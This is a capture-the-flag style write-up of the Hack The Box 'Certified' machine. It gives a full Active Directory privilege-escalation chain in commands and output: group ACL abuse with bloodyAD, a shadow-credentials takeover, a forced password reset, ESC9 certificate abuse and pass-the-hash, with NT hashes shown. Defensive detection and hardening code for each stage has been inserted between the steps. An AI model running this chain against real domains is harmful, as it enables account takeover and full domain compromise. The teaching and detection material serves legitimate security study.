Certified


Machine Information
As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09

1. User

1.1. Information Gathering

1.1.1. Port Scan

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# nmap 10.10.11.41 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 09:23 EDT
Nmap scan report for 10.10.11.41
Host is up (0.066s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49691/tcp open  unknown
49717/tcp open  unknown
49726/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds
┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# nmap 10.10.11.41 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 09:25 EDT
Nmap scan report for 10.10.11.41
Host is up (0.068s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-06 20:01:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
|_ssl-date: 2025-08-06T20:03:02+00:00; +6h35m51s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
|_ssl-date: 2025-08-06T20:03:01+00:00; +6h35m52s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-06T20:03:02+00:00; +6h35m51s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-06T20:03:01+00:00; +6h35m52s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-06T20:02:24
|_  start_date: N/A
|_clock-skew: mean: 6h35m51s, deviation: 0s, median: 6h35m50s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.40 seconds
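The scan reports the DC's clock as more than six hours ahead of the scanner ("+6h35m51s from scanner time"). Kerberos rejects requests whose timestamp is outside the domain's clock-skew tolerance (5 minutes by default), so every Kerberos-based step later in the write-up (the PKINIT logons with Certipy, the TGT requests) depends on the scanning host's clock being synced to the DC first. As an added example, not part of the original write-up, the Python below pulls the domain, DC name and skew out of this nmap output format and checks the skew against the tolerance; the sample output is a constructed copy of the relevant lines above.

```python
import re
from datetime import timedelta

# Kerberos rejects requests whose timestamp differs from the KDC's clock by more than
# the domain's "Maximum tolerance for computer clock synchronization" (default 5 minutes).
KERBEROS_MAX_SKEW = timedelta(minutes=5)

# Constructed sample: the AD-relevant lines from an nmap -sCV run against a DC.
SAMPLE_NMAP_OUTPUT = """\
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
|_ssl-date: 2025-08-06T20:03:02+00:00; +6h35m51s from scanner time.
|_clock-skew: mean: 6h35m51s, deviation: 0s, median: 6h35m50s
"""


def parse_skew(text: str) -> timedelta:
    """Turn an nmap skew string such as '+6h35m51s', '-30s' or '0s' into a timedelta."""
    m = re.fullmatch(r"([+-]?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?", text.strip())
    if m is None or not any(m.group(i) for i in (2, 3, 4)):
        raise ValueError(f"unrecognised skew string: {text!r}")
    sign = -1 if m.group(1) == "-" else 1
    hours, minutes, seconds = (int(g or 0) for g in m.groups()[1:])
    return sign * timedelta(hours=hours, minutes=minutes, seconds=seconds)


def extract_ad_facts(nmap_output: str) -> dict:
    """Pull domain, DC FQDN and clock skew out of nmap -sCV output for a domain controller."""
    facts = {"domain": None, "dc_fqdn": None, "skew": None}
    for line in nmap_output.splitlines():
        # nmap prints the LDAP domain as 'certified.htb0.' (a stray '0.' from the DNS
        # encoding of the domain name), so strip that suffix.
        m = re.search(r"\(Domain: ([\w.-]+?)0\.,", line)
        if m and facts["domain"] is None:
            facts["domain"] = m.group(1)
        # the first DNS entry in the LDAPS certificate SAN is the DC's FQDN
        m = re.search(r"Subject Alternative Name: DNS:([\w.-]+)", line)
        if m and facts["dc_fqdn"] is None:
            facts["dc_fqdn"] = m.group(1)
        m = re.search(r"clock-skew: mean: ([+-]?[\dhms]+)", line)
        if m:
            facts["skew"] = parse_skew(m.group(1))
    return facts


def kerberos_ready(skew: timedelta) -> bool:
    """True when the scanner's clock is close enough to the DC for Kerberos to accept its requests."""
    return abs(skew) <= KERBEROS_MAX_SKEW


if __name__ == "__main__":
    facts = extract_ad_facts(SAMPLE_NMAP_OUTPUT)
    print(facts)
    if not kerberos_ready(facts["skew"]):
        print(f"skew {facts['skew']} exceeds {KERBEROS_MAX_SKEW}: sync the clock before any Kerberos step")
```

The same skew also matters on the defending side: a DC whose clock drifts this far from the rest of the forest breaks Kerberos for legitimate clients long before anyone notices an attacker.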

1.1.2. Initial Credentials

nxc smb certified.htb -u judith.mader -p judith09


1.1.3. SMB

nxc smb certified.htb -u judith.mader -p judith09 --shares


1.1.4. Users

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# nxc smb certified.htb -u judith.mader -p judith09 --users 
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-  
SMB         10.10.11.41     445    DC01             Administrator                 2024-05-13 14:53:16 0       Built-in account for administering the computer/domain
SMB         10.10.11.41     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.41     445    DC01             krbtgt                        2024-05-13 15:02:51 0       Key Distribution Center Service Account
SMB         10.10.11.41     445    DC01             judith.mader                  2024-05-14 19:22:11 0        
SMB         10.10.11.41     445    DC01             management_svc                2024-05-13 15:30:51 0        
SMB         10.10.11.41     445    DC01             ca_operator                   2024-05-13 15:32:03 0        
SMB         10.10.11.41     445    DC01             alexander.huges               2024-05-14 16:39:08 0        
SMB         10.10.11.41     445    DC01             harry.wilson                  2024-05-14 16:39:37 0        
SMB         10.10.11.41     445    DC01             gregory.cameron               2024-05-14 16:40:05 0        
SMB         10.10.11.41     445    DC01             [*] Enumerated 9 local users: CERTIFIED

1.1.5. BloodHound

Rough path:

  • Add JUDITH.MADER to the MANAGEMENT group
  • Use Shadow Credentials to take over MANAGEMENT_SVC
  • Log in as MANAGEMENT_SVC over WinRM

Don't ask how I got there; do enough of these boxes and you'll see it.

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# bloodyAD --host dc01.certified.htb -d certified.htb -u 'judith.mader' -p judith09  set owner MANAGEMENT 'JUDITH.MADER'
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by JUDITH.MADER on MANAGEMENT


┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# bloodyAD --host dc01.certified.htb -d certified.htb -u 'judith.mader' -p judith09  add genericAll  MANAGEMENT 'JUDITH.MADER'
[+] JUDITH.MADER has now GenericAll on MANAGEMENT

Add the user to the group:

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# bloodyAD --host dc01.certified.htb -d certified.htb -u 'judith.mader' -p judith09  add groupMember  MANAGEMENT 'JUDITH.MADER'
[+] JUDITH.MADER added to MANAGEMENT

Verified: the user has been added to the group.

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy-ad  shadow auto -username 'judith.mader@certified.htb' -p 'judith09' -account 'MANAGEMENT_SVC' -dc-ip 10.10.11.41
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '92a9ee13-b5e6-3bef-8d61-5e0f02e9965d'
[*] Adding Key Credential with device ID '92a9ee13-b5e6-3bef-8d61-5e0f02e9965d' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '92a9ee13-b5e6-3bef-8d61-5e0f02e9965d' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

Verify it.
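Everything in this path leaves a trace in the directory itself: the owner and DACL changes on MANAGEMENT, the group membership write, and the key credential that `certipy shadow auto` adds to management_svc and then removes again a few seconds later. With "Audit Directory Service Changes" enabled and a SACL on the relevant objects, each of these writes produces Security event 5136. As an added example (not part of the original write-up, not a Certipy or bloodyAD feature), the Python below runs two detections over constructed 5136 records that follow the sequence above: a foreign write to msDS-KeyCredentialLink (rated high when the same writer deletes the value again shortly after), and a security-descriptor write by a non-admin principal followed by a membership change on the same object. The allowlists and the event records are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class DsChangeEvent:
    """The fields needed from Security event 5136 (A directory service object was modified)."""
    time: datetime
    subject: str     # SubjectUserName: the principal that performed the write
    target: str      # sAMAccountName of the modified object (resolved from ObjectDN)
    attribute: str   # AttributeLDAPDisplayName
    operation: str   # OperationType: "Value Added" (%%14674) or "Value Deleted" (%%14675)


KEYCRED_ATTR = "msDS-KeyCredentialLink"
SECDESC_ATTR = "nTSecurityDescriptor"
# Constructed allowlists: tune to the environment being monitored.
TRUSTED_KEYCRED_WRITERS = {"svc_devicereg"}   # e.g. a device-registration service account
ADMIN_PRINCIPALS = {"Administrator"}           # principals expected to edit owners and DACLs

# Constructed sample telemetry following the path above. Producing these events requires
# "Audit Directory Service Changes" plus a SACL on the objects for the written attributes.
SAMPLE_EVENTS = [
    DsChangeEvent(datetime(2025, 8, 6, 20, 1), "harry.wilson", "harry.wilson", KEYCRED_ATTR, "Value Added"),      # Windows Hello self-enrolment
    DsChangeEvent(datetime(2025, 8, 6, 20, 5), "svc_devicereg", "gregory.cameron", KEYCRED_ATTR, "Value Added"),  # trusted service
    DsChangeEvent(datetime(2025, 8, 6, 20, 8), "judith.mader", "MANAGEMENT", SECDESC_ATTR, "Value Added"),        # set owner
    DsChangeEvent(datetime(2025, 8, 6, 20, 9), "judith.mader", "MANAGEMENT", SECDESC_ATTR, "Value Added"),        # add GenericAll
    DsChangeEvent(datetime(2025, 8, 6, 20, 10), "judith.mader", "MANAGEMENT", "member", "Value Added"),          # add groupMember
    DsChangeEvent(datetime(2025, 8, 6, 20, 11, 5), "judith.mader", "management_svc", KEYCRED_ATTR, "Value Added"),    # shadow credential added
    DsChangeEvent(datetime(2025, 8, 6, 20, 11, 9), "judith.mader", "management_svc", KEYCRED_ATTR, "Value Deleted"),  # and restored
]


def shadow_credential_findings(events, window=timedelta(minutes=10)):
    """Flag msDS-KeyCredentialLink writes made by a principal other than the account itself.

    An add followed by a delete on the same account by the same writer within `window`
    matches the add / authenticate / restore sequence of a shadow-credentials tool and is
    rated high; a lone foreign write is rated medium.
    """
    keycred = sorted((e for e in events if e.attribute == KEYCRED_ATTR), key=lambda e: e.time)
    findings = []
    for i, e in enumerate(keycred):
        if e.operation != "Value Added":
            continue
        if e.subject.lower() == e.target.lower() or e.subject in TRUSTED_KEYCRED_WRITERS:
            continue  # self-service key registration or a known service
        severity = "medium"
        for later in keycred[i + 1:]:
            if later.time - e.time > window:
                break
            if (later.operation == "Value Deleted" and later.subject == e.subject
                    and later.target == e.target):
                severity = "high"
                break
        findings.append({"time": e.time.isoformat(), "writer": e.subject,
                         "target": e.target, "severity": severity})
    return findings


def acl_takeover_findings(events, window=timedelta(minutes=30)):
    """Flag security-descriptor writes (owner or DACL changes) by non-admin principals,
    rated high when the same principal then changes 'member' on the same object."""
    ordered = sorted(events, key=lambda e: e.time)
    groups = {}
    for e in ordered:
        if e.attribute == SECDESC_ATTR and e.subject not in ADMIN_PRINCIPALS:
            groups.setdefault((e.subject, e.target), []).append(e)
    findings = []
    for (writer, obj), writes in groups.items():
        first = writes[0].time
        member_write = any(
            l.attribute == "member" and l.subject == writer and l.target == obj
            and 0 <= (l.time - first).total_seconds() <= window.total_seconds()
            for l in ordered)
        findings.append({"writer": writer, "object": obj, "sd_writes": len(writes),
                         "severity": "high" if member_write else "medium"})
    return findings


if __name__ == "__main__":
    for f in shadow_credential_findings(SAMPLE_EVENTS) + acl_takeover_findings(SAMPLE_EVENTS):
        print(f)
```

Restoring the old key credential does not erase the trail: the delete is itself a 5136, and the pair is a stronger signal than the add alone.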

1.4. WINRM

evil-winrm -i dc01.certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

Pasted image 20250806215112.png

2. System

Change CA_OPERATOR's password:

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# bloodyAD --host dc01.certified.htb -d certified.htb -u 'management_svc' -p  :a091c1832bcdd4677c28b5a6a1295584 set password CA_OPERATOR Admin123!
[+] Password changed successfully!

Verify it.

2.2. ESC9

The box is called Certified, so this is most likely the vulnerability in play.
Enumerate vulnerable certificate templates with certipy:

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy find -u 'CA_OPERATOR@certified.htb' -p 'Admin123!' -dc-ip '10.10.11.41' -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-05-13T15:48:52+00:00
    Template Last Modified              : 2024-05-13T15:55:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Full Control Principals         : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\operator ca
    [!] Vulnerabilities
      `ESC9`                              : Template has no security extension.
    [*] Remarks
      `ESC9`                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

Certipy reports the CertifiedAuthentication template as vulnerable to ESC9.
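What Certipy summarises as "Template has no security extension" is one bit of the template's msPKI-Enrollment-Flag attribute: with NoSecurityExtension set, certificates issued from the template lack the szOID_NTDS_CA_SECURITY_EXT extension that carries the account's SID, so the KDC in compatibility mode (StrongCertificateBindingEnforcement = 1) falls back to mapping the certificate by the UPN in its SAN. That fallback is what the UPN swap in the following steps abuses; in full enforcement mode (value 2) such certificates are rejected. As an added example (not from the write-up or from Certipy), the Python below decodes the raw flag values into the names Certipy prints and reports whether the template-side ESC9 conditions hold for a given KDC setting, together with the template-side fix (clearing the flag). The template record is constructed to match the values printed above; the bit values come from MS-CRTD. Whether an enroller also holds write access over some account's UPN is an ACL question that this check does not cover.

```python
# Bits of msPKI-Enrollment-Flag (MS-CRTD), the subset relevant here
ENROLLMENT_FLAGS = {
    0x00000001: "IncludeSymmetricAlgorithms",
    0x00000002: "PendAllRequests",
    0x00000008: "PublishToDs",
    0x00000020: "AutoEnrollment",
    0x00000100: "UserInteractionRequired",
    0x00000800: "AllowEnrollOnBehalfOf",
    0x00080000: "NoSecurityExtension",
}
# Bits of msPKI-Certificate-Name-Flag (MS-CRTD), subset
NAME_FLAGS = {
    0x00000001: "EnrolleeSuppliesSubject",
    0x02000000: "SubjectAltRequireUpn",
    0x80000000: "SubjectRequireDirectoryPath",
}
# EKUs that make a certificate usable for Kerberos/Schannel logon
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement
KDC_DISABLED, KDC_COMPATIBILITY, KDC_FULL_ENFORCEMENT = 0, 1, 2
NO_SECURITY_EXTENSION = 0x00080000

# Constructed template record mirroring the CertifiedAuthentication values certipy reported
CERTIFIED_AUTHENTICATION = {
    "name": "CertifiedAuthentication",
    "msPKI-Enrollment-Flag": 0x00080028,         # PublishToDs | AutoEnrollment | NoSecurityExtension
    "msPKI-Certificate-Name-Flag": 0x82000000,   # SubjectAltRequireUpn | SubjectRequireDirectoryPath
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],  # Server Auth, Client Auth
    "msPKI-RA-Signature": 0,                     # authorized signatures required
}


def decode_flags(value: int, table: dict) -> list:
    """Return the names of the bits set in `value`, in table order."""
    return [name for bit, name in table.items() if value & bit]


def esc9_exposure(template: dict, kdc_enforcement: int) -> dict:
    """Evaluate the template-side ESC9 conditions against the KDC's binding enforcement mode."""
    enroll = decode_flags(template["msPKI-Enrollment-Flag"], ENROLLMENT_FLAGS)
    names = decode_flags(template["msPKI-Certificate-Name-Flag"], NAME_FLAGS)
    blockers = []
    if "NoSecurityExtension" not in enroll:
        blockers.append("issued certificates carry the szOID_NTDS_CA_SECURITY_EXT SID extension")
    if not CLIENT_AUTH_EKUS & set(template["pKIExtendedKeyUsage"]):
        blockers.append("no client-authentication EKU, certificate is not usable for logon")
    if "PendAllRequests" in enroll or template.get("msPKI-RA-Signature", 0) > 0:
        blockers.append("manager approval or RA signatures required")
    if kdc_enforcement == KDC_FULL_ENFORCEMENT:
        blockers.append("KDC in full enforcement rejects logon certificates without a strong SID mapping")
    return {
        "template": template["name"],
        "enrollment_flags": enroll,
        "name_flags": names,
        "esc9_exposed": not blockers,
        "blockers": blockers,
    }


def harden_template(template: dict) -> dict:
    """Return a copy with NoSecurityExtension cleared: the template-side remediation."""
    fixed = dict(template)
    fixed["msPKI-Enrollment-Flag"] = template["msPKI-Enrollment-Flag"] & ~NO_SECURITY_EXTENSION
    return fixed


if __name__ == "__main__":
    for mode in (KDC_COMPATIBILITY, KDC_FULL_ENFORCEMENT):
        print(mode, esc9_exposure(CERTIFIED_AUTHENTICATION, mode))
    print("hardened", esc9_exposure(harden_template(CERTIFIED_AUTHENTICATION), KDC_COMPATIBILITY))
```

Either fix on its own closes this path: clear the flag on the template, or move the KDC to full enforcement; the latter covers every template at once.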

1: Update ca_operator's UPN to the target administrator's sAMAccountName

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy account  -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41 -user ca_operator -upn Administrator  update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

2: Request a certificate from the ESC9 template as ca_operator

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy req \
    -dc-ip '10.10.11.41' -u 'ca_operator' -p 'Admin123!'\
    -target 'dc01.certified.htb' -ca 'certified-DC01-CA' \
    -template 'CertifiedAuthentication'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

3: Restore ca_operator's UPN

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy account   -u 'management_svc'  -hashes ':a091c1832bcdd4677c28b5a6a1295584' -user 'ca_operator'  -upn 'ca_operator@certified.htb' -dc-ip '10.10.11.41' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'

4: Authenticate as the target administrator

┌──(root㉿kali)-[~/Desktop/htb/Certified]
└─# certipy auth \
    -dc-ip '10.10.11.41' -pfx 'administrator.pfx' \
    -username 'administrator' -domain 'certified.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
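The four steps above are visible in the Security log as a short, ordered sequence: event 4738 (A user account was changed) with the UserPrincipalName field set to another account's sAMAccountName, event 4887 on the CA (certificate issued) to that same account, a second 4738 putting the UPN back, and finally event 4768 (TGT requested) for the impersonated account with PreAuthType 16 (PA-PK-AS-REQ, i.e. PKINIT). As an added example, not part of the original write-up, the Python below correlates constructed records of those events and rates the chain; the `ACCOUNTS` map stands in for an LDAP lookup of existing sAMAccountNames, and the `Template` field on the 4887 record is a simplification (in the real event the template appears inside the Attributes field or must be read from the CA database).

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class SecEvent:
    time: datetime
    event_id: int
    fields: dict  # event data keyed by the field names used in the Security log


# Constructed stand-in for an LDAP lookup: sAMAccountName -> userPrincipalName
ACCOUNTS = {
    "Administrator": "Administrator@certified.htb",
    "ca_operator": "ca_operator@certified.htb",
    "management_svc": "management_svc@certified.htb",
    "harry.wilson": "harry.wilson@certified.htb",
}

T0 = datetime(2025, 8, 6, 22, 10, 0)

# Constructed sample telemetry in the order the four ESC9 steps produce it
SAMPLE_EVENTS = [
    # benign: an admin fixes a user's UPN suffix
    SecEvent(T0, 4738, {"SubjectUserName": "Administrator", "TargetUserName": "harry.wilson",
                        "UserPrincipalName": "harry.wilson@certified.htb"}),
    # step 1: ca_operator's UPN set to another account's sAMAccountName
    SecEvent(T0 + timedelta(minutes=5), 4738, {"SubjectUserName": "management_svc",
                                              "TargetUserName": "ca_operator",
                                              "UserPrincipalName": "Administrator"}),
    # step 2: the CA issues a certificate to ca_operator from the template
    SecEvent(T0 + timedelta(minutes=6), 4887, {"Requester": "CERTIFIED\\ca_operator",
                                              "Template": "CertifiedAuthentication"}),
    # step 3: UPN restored
    SecEvent(T0 + timedelta(minutes=7), 4738, {"SubjectUserName": "management_svc",
                                              "TargetUserName": "ca_operator",
                                              "UserPrincipalName": "ca_operator@certified.htb"}),
    # step 4: TGT for Administrator obtained with PKINIT (PreAuthType 16 = PA-PK-AS-REQ)
    SecEvent(T0 + timedelta(minutes=8), 4768, {"TargetUserName": "Administrator", "PreAuthType": "16",
                                              "CertIssuerName": "certified-DC01-CA"}),
]


def impersonated_account(new_upn: str, changed_account: str):
    """Return the sAMAccountName that the new UPN's local part collides with, or None."""
    local_part = new_upn.split("@")[0].lower()
    for sam in ACCOUNTS:
        if sam.lower() == local_part and sam.lower() != changed_account.lower():
            return sam
    return None


def esc9_chain_findings(events, window=timedelta(minutes=30)):
    """Start a finding at every colliding UPN change and attach the follow-on stages seen within `window`."""
    events = sorted(events, key=lambda e: e.time)
    findings = []
    for i, e in enumerate(events):
        if e.event_id != 4738 or e.fields.get("UserPrincipalName", "-") == "-":
            continue  # "-" means the UPN was not part of this change
        victim = e.fields["TargetUserName"]
        target = impersonated_account(e.fields["UserPrincipalName"], victim)
        if target is None:
            continue
        stages = ["upn_collision"]
        for later in events[i + 1:]:
            if later.time - e.time > window:
                break
            f = later.fields
            if later.event_id == 4887 and f.get("Requester", "").split("\\")[-1].lower() == victim.lower():
                stages.append("certificate_issued:" + f.get("Template", "unknown"))
            elif (later.event_id == 4738 and f.get("TargetUserName") == victim
                    and f.get("UserPrincipalName", "-") != "-"):
                stages.append("upn_restored")
            elif (later.event_id == 4768 and f.get("PreAuthType") == "16"
                    and f.get("TargetUserName", "").lower() == target.lower()):
                stages.append("pkinit_tgt_as_target")
        findings.append({
            "changed_by": e.fields["SubjectUserName"],
            "account": victim,
            "impersonates": target,
            "stages": stages,
            "severity": "critical" if "pkinit_tgt_as_target" in stages else "high",
        })
    return findings


if __name__ == "__main__":
    for finding in esc9_chain_findings(SAMPLE_EVENTS):
        print(finding)
```

The first stage alone is worth an alert: a UPN with no domain suffix that equals another account's name has no legitimate reason to exist, and catching it at step 1 is far cheaper than revoking the certificate after step 4.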

2.3. PTH

evil-winrm -i dc01.certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34
